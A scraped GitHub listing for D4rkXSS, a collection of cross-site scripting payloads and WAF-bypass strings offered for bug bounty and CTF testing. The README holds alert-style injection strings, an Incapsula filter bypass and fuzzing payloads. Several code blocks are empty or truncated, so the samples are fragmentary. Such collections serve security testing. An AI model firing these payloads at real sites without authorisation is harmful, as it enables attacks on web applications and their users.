https://github.com/R0X4R/D4rkXSS
A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF
https://github.com/R0X4R/D4rkXSS
bugbounty bughunter bughunting ethical-hacking hacking javascript xss-exploitation xss-filter xss-vulnerability
Last synced: 4 months ago
JSON representation
A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF
- Host: GitHub
- URL: https://github.com/R0X4R/D4rkXSS
- Owner: R0X4R
- License: other
- Created: 2019-09-30T09:45:22.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2020-03-29T07:55:48.000Z (over 5 years ago)
- Last Synced: 2024-11-16T02:04:54.444Z (12 months ago)
- Topics: bugbounty, bughunter, bughunting, ethical-hacking, hacking, javascript, xss-exploitation, xss-filter, xss-vulnerability
- Homepage: https://github.com/R0X4R/D4rkXSS
- Size: 1.21 MB
- Stars: 161
- Watchers: 7
- Forks: 54
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - R0X4R/D4rkXSS - A list of useful payloads and Bypass for Web Application Security and Bug Bounty/CTF (Others)
README
# D4rkXSS
All in one place for XSS.
R0X4R
# Contribution
This is an open source repo. Anyone can contribute. :beers:
[](https://buymeacoff.ee/R0X4R)
## Bypass WAF
NO SCRIPT
```js
">'>
incapsula bypass:
```
```
\'-alert(1)//
lose focus!
```
Fuzz3r
```
#getURL,javascript:alert(1)",
#goto,javascript:alert(1)",
?javascript:alert(1)",
```
## IMG Error
```
```
## Jhaddix
Jhaddix
```
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<RSnake
```
alert('XSS');
'';!--"=&{()}
```
## MarioXSS
Mario
```
```
## Search Engine XSS
<a href="https://github.com/R0X4R/D4rkXSS/blob/master/seXSS.md">seXSS</a><br/>
## Misc Payloads
<a href="https://github.com/R0X4R/D4rkXSS/blob/master/Misc.md">Misc</a><br/>
## Basic Payloads
<a href="https://github.com/R0X4R/D4rkXSS/blob/master/basicxss.txt">Basic</a><br/>
<li>For Example:</li>
```
<script>alert('1')
">alert('1')